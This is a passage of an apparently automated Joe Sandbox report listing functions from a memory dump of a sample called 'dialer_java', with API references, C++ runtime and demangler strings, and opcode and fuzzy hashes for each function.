NtAllocateVirtualMemoryEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6E3A61156), ref: 00007FF6E3A613F7

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction ID: 3744e0ce1cc0dc6cade55385d7258ac9443734480f345688f3513dbbbcac966b
Opcode Fuzzy Hash: 27820dc2d2f6668a26f19431ae4115d453894afd47fcb02c8a0a545cebde311c
Instruction Fuzzy Hash: 79F0C976A0CB4182D610CF59F84222A7B74FB48380B015835EACDA7765CF3EE0A0CB49

Function 00007FF6E3A83A80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_time64.MSVCRT ref: 00007FF6E3A83AA7
_localtime64_s.MSVCRT ref: 00007FF6E3A83ABF

Strings

%s , xrefs: 00007FF6E3A83AE1
[%Y-%m-%d %H:%M:%S], xrefs: 00007FF6E3A83AC5

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _localtime64_s_time64
String ID: %s $[%Y-%m-%d %H:%M:%S]
API String ID: 2262455995-899559958
Opcode ID: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction ID: fb622665a8dbf02292f0cf30bcfd6cd6757687318b7233245df5be1ec58096bd
Opcode Fuzzy Hash: a058c66051b2317f5e588f79f743636c4437f49c9a2c9167b86e4ef29b80d505
Instruction Fuzzy Hash: 6E01A132718B8250E6109B18F8563FA6764EF887D0F400031E98E637949E3DD189C705

Non-executed Functions

Function 00007FF6E3A76520 Relevance: 37.2, APIs: 16, Strings: 5, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

realloc.MSVCRT ref: 00007FF6E3A766DC
malloc.MSVCRT ref: 00007FF6E3A76735
malloc.MSVCRT ref: 00007FF6E3A767D7
malloc.MSVCRT ref: 00007FF6E3A7684C
memcpy.MSVCRT ref: 00007FF6E3A7686B
realloc.MSVCRT ref: 00007FF6E3A768CB
memchr.MSVCRT ref: 00007FF6E3A7694E
malloc.MSVCRT ref: 00007FF6E3A76999
memcpy.MSVCRT ref: 00007FF6E3A769B8
realloc.MSVCRT ref: 00007FF6E3A76A61
malloc.MSVCRT ref: 00007FF6E3A76A7A
memcpy.MSVCRT ref: 00007FF6E3A76A99
malloc.MSVCRT ref: 00007FF6E3A76B90
free.MSVCRT ref: 00007FF6E3A76C51
_assert.MSVCRT ref: 00007FF6E3A76C80
_assert.MSVCRT ref: 00007FF6E3A76C9A

Strings

Last != First && "Popping empty vector!", xrefs: 00007FF6E3A76C86
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A76C73, 00007FF6E3A76C8D
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6E3A76C6C
'block-literal', xrefs: 00007FF6E3A7682F
yptn, xrefs: 00007FF6E3A768C0

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$memcpyrealloc$_assert$freememchr
String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
API String ID: 3787261664-3461159648
Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction ID: 2eabe8cce145a44d6fca95da0e5c3f4bf4efa98aff464b751c449cb0ed1dcccc
Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
Instruction Fuzzy Hash: 3622B233709B8281EA248F29E4853BA7BA4FB45B84F054235DA9D577E9EF3DE481C305

Function 00007FF6E3A7D0F0 Relevance: 15.4, APIs: 9, Strings: 1, Instructions: 416stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7D207
malloc.MSVCRT ref: 00007FF6E3A7D31B
malloc.MSVCRT ref: 00007FF6E3A7D47B
malloc.MSVCRT ref: 00007FF6E3A7D51E
strlen.MSVCRT ref: 00007FF6E3A7D553
malloc.MSVCRT ref: 00007FF6E3A7D5CE
strlen.MSVCRT ref: 00007FF6E3A7D603
malloc.MSVCRT ref: 00007FF6E3A7D67E
strlen.MSVCRT ref: 00007FF6E3A7D6B3

Strings

objcprot, xrefs: 00007FF6E3A7D2A1

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$strlen
String ID: objcprot
API String ID: 832207080-2390413308
Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction ID: cf63f71301cc327ab38e5b634ad9f01554a151dd3665b5ad329f0fad37ecd153
Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
Instruction Fuzzy Hash: 8B02F333709B8181EB258B28E4857A97BA4EB04B94F454331DFAC573D9DF39E5A2C309

Function 00007FF6E3A74440 Relevance: 13.0, APIs: 10, Instructions: 464COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7446C
malloc.MSVCRT ref: 00007FF6E3A74575
malloc.MSVCRT ref: 00007FF6E3A74675
malloc.MSVCRT ref: 00007FF6E3A74700
malloc.MSVCRT ref: 00007FF6E3A747DA
malloc.MSVCRT ref: 00007FF6E3A748E8
malloc.MSVCRT ref: 00007FF6E3A7495C

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction ID: b7c4e55b2dbc41e49bac922fe71889640647f26a64f3ca18c2d94b6fd24e2bda
Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
Instruction Fuzzy Hash: 6D22E233709B8185EB258B18E0893AD3BA8FB44B80F584239DB9D573D5DF39E592C319

Function 00007FF6E3A64120 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6E3A68350: RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF6E3A684FA

fflush.MSVCRT ref: 00007FF6E3A64370
fflush.MSVCRT ref: 00007FF6E3A6422D

Part of subcall function 00007FF6E3A68A70: getenv.MSVCRT ref: 00007FF6E3A68A93

fflush.MSVCRT ref: 00007FF6E3A64287
fflush.MSVCRT ref: 00007FF6E3A642D2
fflush.MSVCRT ref: 00007FF6E3A64336
fflush.MSVCRT ref: 00007FF6E3A643CE
fflush.MSVCRT ref: 00007FF6E3A6440E
fflush.MSVCRT ref: 00007FF6E3A64448

Strings

libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF6E3A6442B
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF6E3A643F2
libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF6E3A64214
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF6E3A6431D
.anonymous., xrefs: 00007FF6E3A641E6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF6E3A64499
libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF6E3A642B6
libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF6E3A64357
libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF6E3A643AE
libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF6E3A6438D
libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF6E3A6426B

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflush$CaptureContextgetenv
String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
API String ID: 3501801798-3031193476
Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction ID: afc2d264f852b62f6b0b3e01289ffe330833388af6764c87bee00310b474df28
Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
Instruction Fuzzy Hash: 7081B212B1D24241FA14A76EA80B3B96B59AF52BC4F400039DE4EB73C3DE2FE581424F

Function 00007FF6E3A71129 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A711E6
memcpy.MSVCRT ref: 00007FF6E3A71207

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocmemcpy
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 4276657696-3503049562
Opcode ID: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction ID: 4bdc5bf315088304cef6b9371002479283016a7ed2b4b11b7b4f51d233f192c3
Opcode Fuzzy Hash: d973416b99985d58f68cdca0b67b1622ab5263c660939956c0e26541a716c251
Instruction Fuzzy Hash: 95718F33719B8282EA61DB19F4823BA6BA4FB44780F444035DB8D97B95EF3DE084C349

Function 00007FF6E3A660C0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

fputwc.MSVCRT ref: 00007FF6E3A66195
fwprintf.MSVCRT ref: 00007FF6E3A66277

Strings

%-*.*s, xrefs: 00007FF6E3A6626D
%s , xrefs: 00007FF6E3A660C1, 00007FF6E3A660C2
%*.*s, xrefs: 00007FF6E3A6610D
%.*s, xrefs: 00007FF6E3A66250

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fputwcfwprintf
String ID: %*.*s$%-*.*s$%.*s$%s
API String ID: 3232229890-407542676
Opcode ID: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction ID: bd9ed510e85daab7e04dbc231cf832698fc643839c1db50cafdb71b0d85a4fee
Opcode Fuzzy Hash: 6e15c573cd0727096df9284b745dfe6214acec5976200213ec216c7e21dcd879
Instruction Fuzzy Hash: 0E5155B3F2450287E7788E1EE45273A7BA1EB44750B114139DB9ED76A1DE3EE8808B05

Function 00007FF6E3A780F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 133COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6E3A78153
realloc.MSVCRT ref: 00007FF6E3A781A9
realloc.MSVCRT ref: 00007FF6E3A7820D
memcpy.MSVCRT ref: 00007FF6E3A78227
realloc.MSVCRT ref: 00007FF6E3A7825F

Strings

'unnamed, xrefs: 00007FF6E3A781BE
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A78146
Parser->TemplateParams.size() >= OldNumTemplateParamLists, xrefs: 00007FF6E3A7813F

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$_assertmemcpy
String ID: 'unnamed$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Parser->TemplateParams.size() >= OldNumTemplateParamLists
API String ID: 2140428464-3850676658
Opcode ID: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction ID: d4c69ff5f3f1f37a41718a411e10b2fbe7049ed4090cd19d5a9a510bad1e9f8c
Opcode Fuzzy Hash: e98f4957bddb08b3f0627d313fe1925ccf5ed37af1ae49de47ac71d8d8f7d74b
Instruction Fuzzy Hash: D441D2B3B06B8282DE28CF4AE4863B967A5EB54BC4F048531CB9E57795EF3DD0818301

Function 00007FF6E3A7B110 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 183COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A7B24B
realloc.MSVCRT ref: 00007FF6E3A7B2C5

Strings

basic_string, xrefs: 00007FF6E3A7B2FB, 00007FF6E3A7B340
allocator, xrefs: 00007FF6E3A7B302, 00007FF6E3A7B347
starts_with(SV, "basic_"), xrefs: 00007FF6E3A7B416
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A7B41D

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocrealloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$allocator$basic_string$starts_with(SV, "basic_")
API String ID: 948496778-4167058683
Opcode ID: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction ID: 02ac2b0f4d4df6a05bb346250d64fbddae422c0fe589f830a1e4b38dfe606d9b
Opcode Fuzzy Hash: 9392a488f175509cc51113372d72a0b877b6c5a8ab6e9babe2c6c6985595158c
Instruction Fuzzy Hash: 5461E2A3B06B8681DB148B19E4897BD7BA0EB04B84F448232DB5D977D4DF3DE192C349

Function 00007FF6E3A7B520 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B55B
realloc.MSVCRT ref: 00007FF6E3A7B5D1
memcpy.MSVCRT ref: 00007FF6E3A7B5EF
realloc.MSVCRT ref: 00007FF6E3A7B62E
realloc.MSVCRT ref: 00007FF6E3A7B694
realloc.MSVCRT ref: 00007FF6E3A7B6F3

Strings

or<char>, xrefs: 00007FF6E3A7B6B0

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc$memcpy
String ID: or<char>
API String ID: 1833655766-3520798227
Opcode ID: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction ID: df57e3db1fa30eb5ad5b7f6cf5b8fe84a861f3cf47c20babcd8bdf6fd1534fd6
Opcode Fuzzy Hash: c86a95940dfd59be5a52cadd960e1fa1a6bb2816d717a95559760d92432bfea2
Instruction Fuzzy Hash: 1C5182B3A06B8682DE258F59E5953A9B761EB95BC4F00C132CB8E57795EF3CE180C305

Function 00007FF6E3A7E920 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7E970
realloc.MSVCRT ref: 00007FF6E3A7E9CB
realloc.MSVCRT ref: 00007FF6E3A7EA27

Strings

restric, xrefs: 00007FF6E3A7EA38
volatil, xrefs: 00007FF6E3A7E9DC

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: restric$ volatil
API String ID: 471065373-3617781792
Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction ID: 13f0120b8d0f7e153cea7db1bc62a8f1633d30df72c7be8ed8828c2fea5aa33e
Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
Instruction Fuzzy Hash: 5D4164B3B05B8582DA28CF49E4857697761EB94BC4F008431DB9E577A4EF3DE481C345

Function 00007FF6E3A7B468 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 38COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00007FF6E3A7B4FB

Strings

basic_string, xrefs: 00007FF6E3A7B46D
basi, xrefs: 00007FF6E3A7B4B2
starts_with(SV, "basic_"), xrefs: 00007FF6E3A7B4E7
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A7B4EE

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assert
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
API String ID: 1222420520-1046023109
Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction ID: 45a64119237c5711a2e94320893ddd6db761c6ce84c6cf11e1230f7856c09c02
Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
Instruction Fuzzy Hash: CEF0B4B7B06B5281E6648F0CE482B287BA0EB54B60F508230C52CA2AD0DE2F9192C305

Function 00007FF6E3A7C460 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7C498
realloc.MSVCRT ref: 00007FF6E3A7C4FF

Strings

_if:, xrefs: 00007FF6E3A7C4B7
[enable, xrefs: 00007FF6E3A7C4A9

Memory Dump Source

Source File: 00000011.00000002.1953124589.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000011.00000002.1953096686.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953199112.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953221114.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953331516.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000011.00000002.1953355533.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: [enable$_if:
API String ID: 471065373-3342140569
Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction ID: e86d9378ed1dd36926dc6857ffd77f6d3a0413dcba4eb950e341d58004d9b350
Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction Fuzzy Hash: 47114CF3B06B8682DA189F0AF85536DA765EB54BC0F50C531CB4E577A5EE3DE4818304

Function 00007FF6E3A770F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

